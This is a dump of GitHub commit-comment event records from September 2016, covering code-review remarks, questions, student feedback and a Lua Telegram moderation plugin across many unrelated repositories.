{"id":"4614172016","type":"CommitCommentEvent","actor":{"login":"anacondaqq"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":19163458,"position":null,"line":null,"path":null,"commit_id":"90539f48b320e0a197c497d6eecac30b5d00aef6","created_at":"2016-09-25T12:33:44Z","updated_at":"2016-09-25T12:33:44Z","body":"I'm so sorry for offtop, but can someone answer, for what this nullpo checks need?\r\nIs it check if pointer NULL or not? And what he is doing? I saw a lot of such checks in sources, but still can't understand for what they are ) "}},"created_at":"2016-09-25T12:33:44Z"}
{"id":"4614172250","type":"CommitCommentEvent","actor":{"login":"zuhalmazood"},"repo":{"name":"zuhalmazood/imad-2016-app"},"payload":{"comment":{"id":19163459,"position":null,"line":null,"path":null,"commit_id":"048da0dd3dd75fb163c4a66e88362162eb395b7a","created_at":"2016-09-25T12:33:55Z","updated_at":"2016-09-25T12:33:55Z","body":"ff"}},"created_at":"2016-09-25T12:33:55Z"}
{"id":"4614173499","type":"CommitCommentEvent","actor":{"login":"Kwpolska"},"repo":{"name":"getnikola/nikola"},"payload":{"comment":{"id":19163461,"position":8,"line":182,"path":"nikola/post.py","commit_id":"de83db3d920aeca4fab03ab07c7653f6e962e794","created_at":"2016-09-25T12:35:03Z","updated_at":"2016-09-25T12:35:03Z","body":"OSError is also used on line 191 for “no title, slug, date”. Should I change both?"}},"created_at":"2016-09-25T12:35:03Z"}
{"id":"4614174317","type":"CommitCommentEvent","actor":{"login":"deepu105"},"repo":{"name":"jhipster/generator-jhipster"},"payload":{"comment":{"id":19163463,"position":null,"line":null,"path":null,"commit_id":"c1ebbbb09889c60f49fa7f2dc5fbd539168fa230","created_at":"2016-09-25T12:35:40Z","updated_at":"2016-09-25T12:35:40Z","body":"@wmarques @sendilkumarn I couldnt find a better way to do this. let me know if you guys find a better way"}},"created_at":"2016-09-25T12:35:40Z"}
{"id":"4614176490","type":"CommitCommentEvent","actor":{"login":"jfeye"},"repo":{"name":"jfeye/fed"},"payload":{"comment":{"id":19163466,"position":null,"line":null,"path":null,"commit_id":"c578856f9d5d29754c56a33216584b8b26bc28aa","created_at":"2016-09-25T12:37:28Z","updated_at":"2016-09-25T12:37:28Z","body":"Hi! That's exactly what i'm trying to accomplish, but i can't do any tests right now. It should work with the small changes i've added."}},"created_at":"2016-09-25T12:37:28Z"}
{"id":"4614176890","type":"CommitCommentEvent","actor":{"login":"justarandompro"},"repo":{"name":"phuein/NodeWorld-OpenShift"},"payload":{"comment":{"id":19163468,"position":null,"line":null,"path":null,"commit_id":"d5026619d718badcd5766d2ae33aaae5d5fd0fcb","created_at":"2016-09-25T12:37:44Z","updated_at":"2016-09-25T12:37:44Z","body":"Could you make an openshift application for Tuneboy in the future ? "}},"created_at":"2016-09-25T12:37:44Z"}
{"id":"4614177303","type":"CommitCommentEvent","actor":{"login":"hedrok"},"repo":{"name":"asciidoc/asciidoc"},"payload":{"comment":{"id":19163470,"position":5,"line":26,"path":"lang-pl.conf","commit_id":"5ec519dc603e2f19c496b9bd5d5da84661ab7d69","created_at":"2016-09-25T12:38:04Z","updated_at":"2016-09-25T12:38:04Z","body":"@elextr, You have forgotten to add\r\ntemplate::[footer-date]\r\nunder it.\r\nThis way no date will be produced"}},"created_at":"2016-09-25T12:38:04Z"}
{"id":"4614177735","type":"CommitCommentEvent","actor":{"login":"haedeer"},"repo":{"name":"haedeer/-The_Sad_Heartt"},"payload":{"comment":{"id":19163472,"position":37,"line":37,"path":".gitignore","commit_id":"348eb9e5d17bf4dc85c83cdec08db895c9326746","created_at":"2016-09-25T12:38:25Z","updated_at":"2016-09-25T12:38:25Z","body":"G G:\r\ndo\r\nlocal function pre_process(msg)\r\n\r\n    local fwd = 'mate:'..msg.to.id\r\n    if redis:get(fwd) and not is_momod(msg) and msg.fwd_from then\r\n            delete_msg(msg.id, ok_cb, true)\r\n             send_large_msg(get_receiver(msg), '#تنبيه 🔷⚠️ ممنوع عمل اعادة التوجيه 🔕 داخل المجموعة 👥✔️\\n#User @'..msg.from.username)\r\n            return \"ok\"\r\nend\r\n        return msg\r\n    end\r\n    \r\n local function zeoone(msg, matches)\r\n     chat_id = msg.to.id\r\nlocal reply_id = msg['id']\r\n     if is_momod(msg) and matches[1]== 'قفل' and matches[2]== 'التوجيه' then\r\n         local fwd = 'mate:'..msg.to.id\r\n         redis:set(fwd, true)\r\n         local text = \"تم ✅ تفعيل تنبيه اعادة التوجيه 🔷✔️\"\r\n         return reply_msg(reply_id, text, ok_cb, false)\r\n         end\r\nlocal reply_id = msg['id']\r\n    if not is_momod(msg) and matches[1]== 'قفل' and matches[2]== 'التوجي' then\r\n    local text = \"للمشرفين فقط😎🖕🏿\"\r\n return reply_msg(reply_id, text, ok_cb, false)\r\nend\r\nlocal reply_id = msg['id']\r\nif is_momod(msg) and matches[1]== 'فتح' and matches[2]== 'التوجيه' then\r\n    local fwd = 'mate:'..msg.to.id\r\n    redis:del(fwd)\r\n    local text = \"تم ✅ الغاء تفعيل تنبيه اعادة التوجيه 🔷✔️\"\r\n    return reply_msg(reply_id, text, ok_cb, false)\r\nend\r\n\r\nlocal reply_id = msg['id']\r\nif not is_momod(msg) and matches[1]== 'فتح' and matches[2]== 'التوجي' then\r\nlocal text = \"للمشرفين فقط😎🖕🏿\"\r\n return reply_msg(reply_id, text, ok_cb, false)\r\n end\r\n\r\nend\r\nreturn {\r\n    patterns ={\r\n        '^/(قفل) (التوجيه)$',\r\n        '^/(فتح) (التوجيه)$'\r\n    },\r\nrun = zeoone,\r\npre_process = pre_process \r\n}\r\nend "}},"created_at":"2016-09-25T12:38:25Z"}
{"id":"4614177737","type":"CommitCommentEvent","actor":{"login":"lolilolicon"},"repo":{"name":"hexatomium/hexatomium.github.io"},"payload":{"comment":{"id":19163471,"position":12,"line":11,"path":"_posts/2016-04-26-gogoogle.md","commit_id":"edd442bced874bfcccc5207d56aa092e3f2a45cb","created_at":"2016-09-25T12:38:25Z","updated_at":"2016-09-25T12:38:25Z","body":"Interesting find. Probable source:\r\nhttps://hg.mozilla.org/mozilla-central/file/29beaebdfacc/xpfe/components/autocomplete/resources/content/autocomplete.xml#l1012"}},"created_at":"2016-09-25T12:38:25Z"}
{"id":"4614178287","type":"CommitCommentEvent","actor":{"login":"haedeer"},"repo":{"name":"haedeer/-The_Sad_Heartt"},"payload":{"comment":{"id":19163473,"position":11,"line":11,"path":".gitignore","commit_id":"348eb9e5d17bf4dc85c83cdec08db895c9326746","created_at":"2016-09-25T12:38:49Z","updated_at":"2016-09-25T12:38:49Z","body":"G G:\r\ndo\r\nlocal function pre_process(msg)\r\n\r\n    local fwd = 'mate:'..msg.to.id\r\n    if redis:get(fwd) and not is_momod(msg) and msg.fwd_from then\r\n            delete_msg(msg.id, ok_cb, true)\r\n             send_large_msg(get_receiver(msg), '#تنبيه 🔷⚠️ ممنوع عمل اعادة التوجيه 🔕 داخل المجموعة 👥✔️\\n#User @'..msg.from.username)\r\n            return \"ok\"\r\nend\r\n        return msg\r\n    end\r\n    \r\n local function zeoone(msg, matches)\r\n     chat_id = msg.to.id\r\nlocal reply_id = msg['id']\r\n     if is_momod(msg) and matches[1]== 'قفل' and matches[2]== 'التوجيه' then\r\n         local fwd = 'mate:'..msg.to.id\r\n         redis:set(fwd, true)\r\n         local text = \"تم ✅ تفعيل تنبيه اعادة التوجيه 🔷✔️\"\r\n         return reply_msg(reply_id, text, ok_cb, false)\r\n         end\r\nlocal reply_id = msg['id']\r\n    if not is_momod(msg) and matches[1]== 'قفل' and matches[2]== 'التوجي' then\r\n    local text = \"للمشرفين فقط😎🖕🏿\"\r\n return reply_msg(reply_id, text, ok_cb, false)\r\nend\r\nlocal reply_id = msg['id']\r\nif is_momod(msg) and matches[1]== 'فتح' and matches[2]== 'التوجيه' then\r\n    local fwd = 'mate:'..msg.to.id\r\n    redis:del(fwd)\r\n    local text = \"تم ✅ الغاء تفعيل تنبيه اعادة التوجيه 🔷✔️\"\r\n    return reply_msg(reply_id, text, ok_cb, false)\r\nend\r\n\r\nlocal reply_id = msg['id']\r\nif not is_momod(msg) and matches[1]== 'فتح' and matches[2]== 'التوجي' then\r\nlocal text = \"للمشرفين فقط😎🖕🏿\"\r\n return reply_msg(reply_id, text, ok_cb, false)\r\n end\r\n\r\nend\r\nreturn {\r\n    patterns ={\r\n        '^/(قفل) (التوجيه)$',\r\n        '^/(فتح) (التوجيه)$'\r\n    },\r\nrun = zeoone,\r\npre_process = pre_process \r\n}\r\nend"}},"created_at":"2016-09-25T12:38:49Z"}
{"id":"4614179269","type":"CommitCommentEvent","actor":{"login":"pranay360"},"repo":{"name":"pranay360/gensim"},"payload":{"comment":{"id":19163477,"position":null,"line":null,"path":null,"commit_id":"5bc70b6ff607168f71d229ab51f44106b966a097","created_at":"2016-09-25T12:39:30Z","updated_at":"2016-09-25T12:39:30Z","body":"Related to fix for issue #743"}},"created_at":"2016-09-25T12:39:30Z"}
{"id":"4614179550","type":"CommitCommentEvent","actor":{"login":"zuhalmazood"},"repo":{"name":"zuhalmazood/imad-2016-app"},"payload":{"comment":{"id":19163478,"position":null,"line":null,"path":null,"commit_id":"2c2809d5209f10ea39dafcd079c3647b7c98d81e","created_at":"2016-09-25T12:39:44Z","updated_at":"2016-09-25T12:39:44Z","body":"g"}},"created_at":"2016-09-25T12:39:44Z"}
{"id":"4614181118","type":"CommitCommentEvent","actor":{"login":"brauner"},"repo":{"name":"brauner/lxd"},"payload":{"comment":{"id":19163479,"position":null,"line":null,"path":null,"commit_id":"726bbdaf130f7ba152da2f5ee36c1b9c3d5c777d","created_at":"2016-09-25T12:41:01Z","updated_at":"2016-09-25T12:41:01Z","body":"Hm, so is your point that `NewMigrationSource()` shouldn't gain an additional argument because that I would understand. If that is not the problem, live migration should still work because. As before, live migration is also done if the container is found to be running. That was how the old code determined if live migration is needed and that part hasn't changed. Setting `Live` to true is just a second way of getting live migration to work. `if live || (c != nil && c.IsRunning()) {`"}},"created_at":"2016-09-25T12:41:01Z"}
{"id":"4614181187","type":"CommitCommentEvent","actor":{"login":"wonglkd"},"repo":{"name":"CUMSA/members"},"payload":{"comment":{"id":19163481,"position":2,"line":2,"path":"resources/views/internlink/index.blade.php","commit_id":"b6bc11e820c16cd34a7f5f54e462bdf5db9df170","created_at":"2016-09-25T12:41:06Z","updated_at":"2016-09-25T12:41:06Z","body":"Definitely! A few things for the future: you can look at `git stash`. Also, at larger companies, all commits under a PR are squashed into a single commit so such things don't matter anyway."}},"created_at":"2016-09-25T12:41:06Z"}
{"id":"4614181434","type":"CommitCommentEvent","actor":{"login":"hebestreit"},"repo":{"name":"typearea/projectmanagement"},"payload":{"comment":{"id":19163484,"position":null,"line":null,"path":null,"commit_id":"7109d7409f168a3510ed89b71a1016ecdc3ac12d","created_at":"2016-09-25T12:41:17Z","updated_at":"2016-09-25T12:41:17Z","body":"Also ich würde empfehlen die Menü-Punkte Impressum und Co in das Hamburger-Menü zu packen.\r\nEs sieht zwar in dem Beispiel noch sehr spartanisch aus. Wir dürften aber denke ich genug Punkte finden. Vllt. könnte man ja schonmal die \"Ideen\" (Lesezeichen, usw.), die zum Beta-Start noch nicht fertig sind trotzdem als Menüpunkte aufnehmen aber ohne Funktion hinterlegen.  \r\n\r\n\r\nDas (i) wäre dann in der Tat nur auf der Detail-Seite interessant. Ebenfalls würde ich noch das Logo/Schriftzug links in den Header mit aufnehmen. "}},"created_at":"2016-09-25T12:41:17Z"}
{"id":"4614181654","type":"CommitCommentEvent","actor":{"login":"wdlkmpx"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":19163485,"position":null,"line":null,"path":null,"commit_id":"81d8d031482691f7d0f62d56ef41a29dc85049bd","created_at":"2016-09-25T12:41:28Z","updated_at":"2016-09-25T12:41:28Z","body":"the browser takes a lot of time to load, that's all i was thinking\n"}},"created_at":"2016-09-25T12:41:28Z"}
{"id":"4614181968","type":"CommitCommentEvent","actor":{"login":"vlakoff"},"repo":{"name":"laravel/framework"},"payload":{"comment":{"id":19163486,"position":null,"line":null,"path":null,"commit_id":"574848fd157fe6d3be943da19f560cb1079f7011","created_at":"2016-09-25T12:41:45Z","updated_at":"2016-09-25T12:41:45Z","body":"I think `Str::replaceFirst()` would be a better fit."}},"created_at":"2016-09-25T12:41:45Z"}
{"id":"4614187804","type":"CommitCommentEvent","actor":{"login":"maximtop"},"repo":{"name":"maximtop/check-guess-clj"},"payload":{"comment":{"id":19163493,"position":18,"line":18,"path":"src/check_score_clj/core.clj","commit_id":"3acd5fb36b5a41898a0d62da71f8bd269a41f5a1","created_at":"2016-09-25T12:47:01Z","updated_at":"2016-09-25T12:47:01Z","body":"Я тут не совсем понял. Строчка осталась после того как я проверял как работает проект. Я только ее должен убрать? "}},"created_at":"2016-09-25T12:47:01Z"}
{"id":"4614196281","type":"CommitCommentEvent","actor":{"login":"MakerTim"},"repo":{"name":"MakerTim/LuckPermsUI"},"payload":{"comment":{"id":19163503,"position":1,"line":1,"path":"src/main/java/META-INF/MANIFEST.MF","commit_id":"a7ec0732e0c383ab56124fa596d63b9df3791451","created_at":"2016-09-25T12:54:29Z","updated_at":"2016-09-25T12:54:29Z","body":"Allright, never knew that"}},"created_at":"2016-09-25T12:54:29Z"}
{"id":"4614196985","type":"CommitCommentEvent","actor":{"login":"rakio1234"},"repo":{"name":"kmorimoto68/bookshelf"},"payload":{"comment":{"id":19163505,"position":10,"line":17,"path":"config/routes.rb","commit_id":"b434f42429af39646255fb071481a05c42bf69f1","created_at":"2016-09-25T12:55:08Z","updated_at":"2016-09-25T12:55:08Z","body":"個々の本に対してのお気入りなので\r\n`book/:id/favorites`\r\nとurlが表現できればよさそうです\r\nbooksにネストさせましょう\r\n"}},"created_at":"2016-09-25T12:55:08Z"}
{"id":"4614197360","type":"CommitCommentEvent","actor":{"login":"SpEcHiDe"},"repo":{"name":"AZHARULLAH/azharullah.github.io"},"payload":{"comment":{"id":19163506,"position":null,"line":null,"path":null,"commit_id":"0d557b9e7e2d0a1198321483b1fbe1850102f032","created_at":"2016-09-25T12:55:26Z","updated_at":"2016-09-25T12:55:26Z","body":"change the link format to // instead of http:// "}},"created_at":"2016-09-25T12:55:26Z"}
{"id":"4614199037","type":"CommitCommentEvent","actor":{"login":"rakio1234"},"repo":{"name":"kmorimoto68/bookshelf"},"payload":{"comment":{"id":19163509,"position":2,"line":2,"path":"app/views/users/_favorite.html.haml","commit_id":"b434f42429af39646255fb071481a05c42bf69f1","created_at":"2016-09-25T12:56:53Z","updated_at":"2016-09-25T12:56:53Z","body":"https://github.com/kmorimoto68/bookshelf/commit/b434f42429af39646255fb071481a05c42bf69f1#commitcomment-19163505\r\nを対応すればparamsからbook_idは取れるので必要なくなりそうです"}},"created_at":"2016-09-25T12:56:53Z"}
{"id":"4614200054","type":"CommitCommentEvent","actor":{"login":"murko69"},"repo":{"name":"dlrudie/Snip"},"payload":{"comment":{"id":19163511,"position":null,"line":null,"path":null,"commit_id":"e21b9b19c13bbda3cde295994eba3c776ac30234","created_at":"2016-09-25T12:57:45Z","updated_at":"2016-09-25T12:57:45Z","body":"Thanks :)"}},"created_at":"2016-09-25T12:57:45Z"}
{"id":"4614202396","type":"CommitCommentEvent","actor":{"login":"ThisTestUser"},"repo":{"name":"ThisTestUser/Docs"},"payload":{"comment":{"id":19163515,"position":null,"line":null,"path":null,"commit_id":"ee739e1721641f4655aafd3d0cddd9b7defd69f0","created_at":"2016-09-25T12:59:35Z","updated_at":"2016-09-25T12:59:35Z","body":"Are you sure? It opens up a new tab."}},"created_at":"2016-09-25T12:59:35Z"}
{"id":"4614204870","type":"CommitCommentEvent","actor":{"login":"abresler"},"repo":{"name":"abresler/fundManageR"},"payload":{"comment":{"id":19163519,"position":1289,"line":8364,"path":"R/adv_functions.R","commit_id":"c27912904e14838de1010534bd7dfbc74a657071","created_at":"2016-09-25T13:01:18Z","updated_at":"2016-09-25T13:01:18Z","body":"Agreed I will turn off that as the default action\n\n----------------------\nAlex Bresler\nabresler@asbcllc.com\n\n​www.asbcllc.com​\n\n917-455-0239 (cell)\n\nOn Sep 25, 2016 8:27 AM, \"timelyportfolio\" <notifications@github.com> wrote:\n\n> This seems to wipe out everything in Trash/Recycle Bin, which is pretty\n> aggressive and potentially very problematic. I would suggest removing this (\n> #4 <https://github.com/abresler/fundManageR/issues/4>) if I understand\n> its purpose.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/abresler/fundManageR/commit/c27912904e14838de1010534bd7dfbc74a657071#commitcomment-19163450>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAtM1IvbfFQhc0BoA1P9hxB38U5v1Fsnks5qtmi3gaJpZM4KF45G>\n> .\n>\n"}},"created_at":"2016-09-25T13:01:18Z"}
{"id":"4614206390","type":"CommitCommentEvent","actor":{"login":"Cheedoong"},"repo":{"name":"ShadowFog/shadowsocks-windows"},"payload":{"comment":{"id":19163521,"position":22,"line":159,"path":"shadowsocks-csharp/Model/Configuration.cs","commit_id":"9a96460aac5faf183da198230b4f3d9de4cb5f2f","created_at":"2016-09-25T13:02:34Z","updated_at":"2016-09-25T13:02:34Z","body":"string url[4] = {...}   then for (i = 0 to 3)... \r\ntry one by one"}},"created_at":"2016-09-25T13:02:34Z"}
{"id":"4614206407","type":"CommitCommentEvent","actor":{"login":"msprotz"},"repo":{"name":"FStarLang/FStar"},"payload":{"comment":{"id":19163522,"position":null,"line":null,"path":null,"commit_id":"0ef39dd5699292e66589a78d723932592184f691","created_at":"2016-09-25T13:02:35Z","updated_at":"2016-09-25T13:02:35Z","body":"I think this is a bad side-effect of using `git pull --rebase` by default. Let me try to reverse engineer what happened."}},"created_at":"2016-09-25T13:02:35Z"}
{"id":"4614208240","type":"CommitCommentEvent","actor":{"login":"rohitmanglik"},"repo":{"name":"rohitmanglik/scrap-preprocessor"},"payload":{"comment":{"id":19163524,"position":53,"line":81,"path":"geocodertest.py","commit_id":"a003b81ac86bf502d44491eb1e7be52bae79489c","created_at":"2016-09-25T13:04:04Z","updated_at":"2016-09-25T13:04:04Z","body":"1) Above link is of \"page\" and I think you are going for \"place\". Is it correct? How both of them are interlinked?\r\n\r\n2) Also add following details:\r\na) is_verified -> new field\r\nb) featured_video -> new field\r\nc) emails -> if email id already present and is same as this-> skip it; else add this value in a new column\r\nd) website -> add if not already present.\r\ne) phone -> add if not already present\r\n\r\nRegarding cover photo: merge it with Images URL and listing_gallery. Cover photo should be the first value in those comma separated values\r\n\r\n3) Leverage following details if possible\r\na) https://developers.facebook.com/docs/graph-api/reference/page/photos/, https://developers.facebook.com/docs/graph-api/reference/page/picture/ => Prepend both of them in Images URL and listing_gallery.\r\n\r\nb) https://developers.facebook.com/docs/graph-api/reference/page/ratings/ -> Merge it with the three columns created by Ratings and reviews of Google places.\r\n\r\nc) https://developers.facebook.com/docs/graph-api/reference/video/ -> New column"}},"created_at":"2016-09-25T13:04:04Z"}
{"id":"4614208800","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"anton-kushnaryov/lemon-school"},"payload":{"comment":{"id":19163525,"position":34,"line":34,"path":"2/index.html","commit_id":"63975f00bf45653d51fb063cef2e9cd40257ad23","created_at":"2016-09-25T13:04:32Z","updated_at":"2016-09-25T13:04:32Z","body":"предполагалось, что это ссылки, внимательнее"}},"created_at":"2016-09-25T13:04:32Z"}
{"id":"4614210900","type":"CommitCommentEvent","actor":{"login":"hitzzc"},"repo":{"name":"hitzzc/go-leetcode"},"payload":{"comment":{"id":19163530,"position":4,"line":4,"path":"climbing_stairs/climbing_stairs.go","commit_id":"75d41991a5c22672ed3e962e94ead52fedf4b8fc","created_at":"2016-09-25T13:06:14Z","updated_at":"2016-09-25T13:06:14Z","body":"ttt"}},"created_at":"2016-09-25T13:06:14Z"}
{"id":"4614210906","type":"CommitCommentEvent","actor":{"login":"losh11"},"repo":{"name":"wangxinxi/litecoin"},"payload":{"comment":{"id":19163531,"position":null,"line":null,"path":null,"commit_id":"a73bdf4574e0defb46a2663f1be08a7bcce81d57","created_at":"2016-09-25T13:06:15Z","updated_at":"2016-09-25T13:06:15Z","body":"Thanks, I needed this.\r\n"}},"created_at":"2016-09-25T13:06:15Z"}
{"id":"4614213487","type":"CommitCommentEvent","actor":{"login":"msprotz"},"repo":{"name":"FStarLang/FStar"},"payload":{"comment":{"id":19163536,"position":null,"line":null,"path":null,"commit_id":"0ef39dd5699292e66589a78d723932592184f691","created_at":"2016-09-25T13:08:16Z","updated_at":"2016-09-25T13:08:16Z","body":"Here's a possible scenario that would result in what you observe:\r\n- fix stuff locally on master, creating commit A\r\n- checkout nik_private\r\n- merge master into nik_private, bringing commit A into nik_private \r\n- git checkout master\r\n- realize that master is behind origin/master\r\n- git pull (your default is git pull --rebase)\r\n- this _replays_ commit A onto origin/master, creating a commit A' that has a different sha1 but the same contents as commit A\r\n- later on, merge branch nik_private into master, which in effect brings commit A on top of a master that already commit A'.\r\n\r\ngit is smart enough to realize that this is pretty much the same thing and doesn't create a merge conflict (something svn would do if I recall correctly). However, this results in a suboptimal history.\r\n\r\nIf we start being disciplined about committing stuff on branches, then it's probably better to forgo the usage of pull --rebase by default, *or* demand that only branches be rebased on top of master, never master itself."}},"created_at":"2016-09-25T13:08:16Z"}
{"id":"4614213736","type":"CommitCommentEvent","actor":{"login":"JoelBalmer"},"repo":{"name":"eskimomatt/webVRsound"},"payload":{"comment":{"id":19163537,"position":null,"line":null,"path":null,"commit_id":"f41c55b7d40d458d64adc1f9ab7fab91b25685b1","created_at":"2016-09-25T13:08:29Z","updated_at":"2016-09-25T13:08:29Z","body":"The commit name was meant to include markdown, like this:\r\n\r\n* Tried using a PositionAudio object this time instead [here](https://threejs.org/examples/#misc_sound)\r\n* Explored the potential of audio3D too [here](https://codepen.io/RoryDuncan/pen/Jvfpw)\r\n\r\nCheers!"}},"created_at":"2016-09-25T13:08:29Z"}
{"id":"4614214409","type":"CommitCommentEvent","actor":{"login":"coorg"},"repo":{"name":"ekeeke/Genesis-Plus-GX"},"payload":{"comment":{"id":19163538,"position":null,"line":null,"path":null,"commit_id":"8b909e40350ffe7a85176912c60f869221f57510","created_at":"2016-09-25T13:09:00Z","updated_at":"2016-09-25T13:09:00Z","body":"Will this also require a updated libretro? With the latest core downloaded from here, the controller is responsive after changing from (3 to six button), but is still detecting as a six button when you choose 3 button. "}},"created_at":"2016-09-25T13:09:00Z"}
{"id":"4614217317","type":"CommitCommentEvent","actor":{"login":"Cheedoong"},"repo":{"name":"ShadowFog/shadowsocks-windows"},"payload":{"comment":{"id":19163543,"position":24,"line":161,"path":"shadowsocks-csharp/Model/Configuration.cs","commit_id":"9a96460aac5faf183da198230b4f3d9de4cb5f2f","created_at":"2016-09-25T13:11:08Z","updated_at":"2016-09-25T13:11:08Z","body":"// below follows 302 till the real content, like ```curl -L```\r\ncurrent_url = url(i);  // initial is url(i)\r\ndo \r\n{\r\n    request(current_url); \r\n    http_status_code = (...);\r\n    if (http_status_code == 302)\r\n        current_url = parse_reponse(...);\r\n} while (http_status_code != 302)"}},"created_at":"2016-09-25T13:11:08Z"}
{"id":"4614217584","type":"CommitCommentEvent","actor":{"login":"jaedon"},"repo":{"name":"open-spycat/meta-spycat"},"payload":{"comment":{"id":19163545,"position":null,"line":null,"path":null,"commit_id":"ef66848a65be4630f6855fab871c99cbd8ec2e20","created_at":"2016-09-25T13:11:20Z","updated_at":"2016-09-25T13:11:20Z","body":"Fixed. Thanks!"}},"created_at":"2016-09-25T13:11:20Z"}
{"id":"4614217808","type":"CommitCommentEvent","actor":{"login":"awalterschulze"},"repo":{"name":"mozilla-services/heka"},"payload":{"comment":{"id":19163546,"position":5,"line":6,"path":"cmake/message_proto.cmake","commit_id":"eb72fbf7d2d28249fbaf8d8dc6607f4eb6f03351","created_at":"2016-09-25T13:11:29Z","updated_at":"2016-09-25T13:11:29Z","body":"You could change this to\r\n\r\n```\r\nCOMMAND ${PROTOBUF_EXECUTABLE} --gogofast_out=. message.proto\r\n```"}},"created_at":"2016-09-25T13:11:29Z"}
{"id":"4614218304","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"pavel-oliinyk/lemon-school"},"payload":{"comment":{"id":19163549,"position":5,"line":22,"path":"2/index.html","commit_id":"0b23a34d13a3fb43667736f8ae06ebe1046ac8a0","created_at":"2016-09-25T13:11:56Z","updated_at":"2016-09-25T13:11:56Z","body":"Ошибка валидатора - Bad value 24%; for attribute width on element img: Expected a digit but saw % instead.\r\nнужно использовать просто целые числа без указания единиц измерения, и эти целые числа воспринимаются браузером как пиксели"}},"created_at":"2016-09-25T13:11:56Z"}
{"id":"4614218388","type":"CommitCommentEvent","actor":{"login":"awalterschulze"},"repo":{"name":"mozilla-services/heka"},"payload":{"comment":{"id":19163550,"position":3,"line":3,"path":"message/message.proto","commit_id":"eb72fbf7d2d28249fbaf8d8dc6607f4eb6f03351","created_at":"2016-09-25T13:12:00Z","updated_at":"2016-09-25T13:12:00Z","body":"And then you can remove all of this."}},"created_at":"2016-09-25T13:12:00Z"}
{"id":"4614218915","type":"CommitCommentEvent","actor":{"login":"ice1000"},"repo":{"name":"icela/FriceEngine-CSharp"},"payload":{"comment":{"id":19163553,"position":null,"line":null,"path":null,"commit_id":"c9329d4778383caa1e2db38d94aff179bc78f0d6","created_at":"2016-09-25T13:12:26Z","updated_at":"2016-09-25T13:12:26Z","body":"嗯，提供了整整三个 :joy:"}},"created_at":"2016-09-25T13:12:26Z"}
{"id":"4614219325","type":"CommitCommentEvent","actor":{"login":"jonpas"},"repo":{"name":"toadie2k/NIArms"},"payload":{"comment":{"id":19163554,"position":34,"line":18,"path":"Compatibility/hlc_CUP_Compat_AUG/config.cpp","commit_id":"0f7e07b26e4f69a13f7ac84441905d552fb77c68","created_at":"2016-09-25T13:12:45Z","updated_at":"2016-09-25T13:12:45Z","body":"@robalo tab"}},"created_at":"2016-09-25T13:12:45Z"}
{"id":"4614219484","type":"CommitCommentEvent","actor":{"login":"jonpas"},"repo":{"name":"toadie2k/NIArms"},"payload":{"comment":{"id":19163555,"position":34,"line":18,"path":"Compatibility/hlc_rhs_compat_AUG/config.cpp","commit_id":"0f7e07b26e4f69a13f7ac84441905d552fb77c68","created_at":"2016-09-25T13:12:52Z","updated_at":"2016-09-25T13:12:52Z","body":"@robalo tab"}},"created_at":"2016-09-25T13:12:52Z"}
{"id":"4614219659","type":"CommitCommentEvent","actor":{"login":"ice1000"},"repo":{"name":"icela/FriceEngine-CSharp"},"payload":{"comment":{"id":19163558,"position":null,"line":null,"path":null,"commit_id":"c9329d4778383caa1e2db38d94aff179bc78f0d6","created_at":"2016-09-25T13:13:02Z","updated_at":"2016-09-25T13:13:02Z","body":"感谢ifdog老司机"}},"created_at":"2016-09-25T13:13:02Z"}
{"id":"4614219827","type":"CommitCommentEvent","actor":{"login":"WorkBobby"},"repo":{"name":"WorkBobby/Test"},"payload":{"comment":{"id":19163559,"position":null,"line":null,"path":null,"commit_id":"379d34ff12d00a657dd83729748f3b35d8e9c699","created_at":"2016-09-25T13:13:09Z","updated_at":"2016-09-25T13:13:09Z","body":"ffffffffffff"}},"created_at":"2016-09-25T13:13:09Z"}
{"id":"4614219967","type":"CommitCommentEvent","actor":{"login":"open-spycat"},"repo":{"name":"open-spycat/meta-spycat"},"payload":{"comment":{"id":19163560,"position":null,"line":null,"path":null,"commit_id":"ef66848a65be4630f6855fab871c99cbd8ec2e20","created_at":"2016-09-25T13:13:16Z","updated_at":"2016-09-25T13:13:16Z","body":"Fixed. Thanks!"}},"created_at":"2016-09-25T13:13:16Z"}
{"id":"4614220542","type":"CommitCommentEvent","actor":{"login":"pranav01"},"repo":{"name":"neobuddy89/android_device_cyanogen_msm8916-common"},"payload":{"comment":{"id":19163562,"position":null,"line":null,"path":null,"commit_id":"1a796599b002119becdab7326c7be23e3804896f","created_at":"2016-09-25T13:13:45Z","updated_at":"2016-09-25T13:13:45Z","body":"Revert this"}},"created_at":"2016-09-25T13:13:45Z"}
{"id":"4614221968","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"dmitry-ponizov/lemon-school"},"payload":{"comment":{"id":19163565,"position":33,"line":33,"path":"2/index.html","commit_id":"ccaa12a70ccb75f713d5c86befbeaa36bb4bf291","created_at":"2016-09-25T13:14:54Z","updated_at":"2016-09-25T13:14:54Z","body":"нужно указывать текст внутри ссылки и тогда этот текст будет ссылкой, в данном случае твои ссылки на странице не отображаются"}},"created_at":"2016-09-25T13:14:54Z"}
{"id":"4614222125","type":"CommitCommentEvent","actor":{"login":"pranav01"},"repo":{"name":"neobuddy89/android_device_cyanogen_msm8916-common"},"payload":{"comment":{"id":19163566,"position":null,"line":null,"path":null,"commit_id":"4c8b0f87dff2dc5abfb9209611dc1375e29106e4","created_at":"2016-09-25T13:15:03Z","updated_at":"2016-09-25T13:15:03Z","body":"Lettuce doesn't have these camera parameters! "}},"created_at":"2016-09-25T13:15:03Z"}
{"id":"4614222608","type":"CommitCommentEvent","actor":{"login":"awalterschulze"},"repo":{"name":"mesos/mesos-go"},"payload":{"comment":{"id":19163567,"position":24,"line":24,"path":"mesosproto/allocator.proto","commit_id":"7870a46fd9ad7d9d47dc518c46750c969c602bde","created_at":"2016-09-25T13:15:23Z","updated_at":"2016-09-25T13:15:23Z","body":"You could possibly use something as simple as protoc --gogoslick_out=. and remove the complex proto_path, the import of gogo.proto and the options enabled here.\r\nhttps://github.com/gogo/protobuf#more-speed-and-more-generated-code"}},"created_at":"2016-09-25T13:15:23Z"}
